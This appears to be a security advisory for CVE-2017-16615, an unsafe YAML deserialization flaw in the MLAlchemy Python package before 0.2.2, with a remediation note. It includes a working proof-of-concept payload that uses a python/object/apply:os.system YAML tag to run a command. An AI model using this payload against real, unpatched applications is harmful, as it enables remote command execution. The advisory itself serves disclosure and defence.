CVE-2017-16615: Critical RESTful Web Applications Vulnerability

Python Package:　　MLAlchemy

Version:　　　　　 Before 0.2.2

Published:　　　　Nov. 7th. 2017

Reported by: 　　　　　 Joel

CVE-2017-16615 　　　CVE_details

Overview

MLAlchemy is a Python-based utility library aimed at allowing relatively safe conversion from YAML/JSON to SQLAlchemy read-only queries. One use case here is to allow RESTful web applications (written in Python) to receive YAML- or JSON-based queries for data, e.g. from a front-end JavaScript-based application. By exploiting vulnerability, attackers can execute arbitrary python commands resulting in command execution. Due to a wide range of involved, the vulnerability is extremely dangerous.

An issue was discovered in the MLAlchemy package before 0.2.2.Untrusted data passed into the parse_yaml_query() function can execute arbitrary python commands resulting in command execution.

POC

1
2

from mlalchemy import parse_yaml_query
parse_yaml_query('!!python/object/apply:os.system ["calc.exe"]')

Poc Video

Remediation

The updated versions of MLAlchemy (0.2.2) correctly use the yaml.safe_load method which prevents remote code execution.